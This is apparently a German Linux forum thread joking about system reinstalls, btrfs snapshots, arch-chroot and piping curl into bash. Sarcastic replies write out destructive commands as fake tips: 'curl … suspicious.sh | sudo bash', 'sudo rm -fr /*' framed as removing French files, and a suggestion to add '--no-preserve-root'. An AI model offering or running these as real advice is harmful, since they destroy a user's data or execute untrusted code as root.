Notlos kann ich sagen: Heute habe ich mein System zweimal neu aufgesetzt. Das zweite mal für Glück UwU
Mit Timeshift/atomic-desktop/btrfs-snapshots/nixos oder anderem backup/rollback halt alles kein Problem 😻
btrfs-snapshots sind richtig toll. Leider hab ich damit auch schonmal was kaputt gemacht. Hab dummerweise nicht dran gedacht, dass zwischen snapshot und Problem updates auf nen neuen Kernel liefen. Immerhin hab ich so arch-chroot kennengelernt und es ist absolut fantastisch.
Prüfen? In Fenster? Neeee lass mal. Als ob man in Fenster noch irgendwas schlimmer machen könnte, so weit wie die Verkotifizierung da schon fortgeschritten ist.
Ist das nicht der Weg ?
Curl in Bash macht brrrr.
AUR superiösität.
curl https://random.web.site/scripts/suspicious.sh | sudo bash
sudo rm -fr /*
Um alles Französische von der Platte zu löschen
Das probier ich morgen aus. Tipps aus dem Internet können nicht flasch sein
Vergiss nicht
--no-preserve-root
hinzuzufügen, um auch wirklich alles mit französischen Wurzeln zu entfernen.Braucht man nur mit
/
, nicht bei/*
.
Wie sinst soll man die Konfiguration, die man in dem GitRepo gefunden hat richtig hinbekommen?
Du meinst, “Wie soll ich sonst mein Enterprise-Container-Verwaltungssystem auf den Produktionsserver bringen?”
Wie sinst soll man die Konfiguration, die man in dem GitRepo gefunden hat richtig hinbekommen?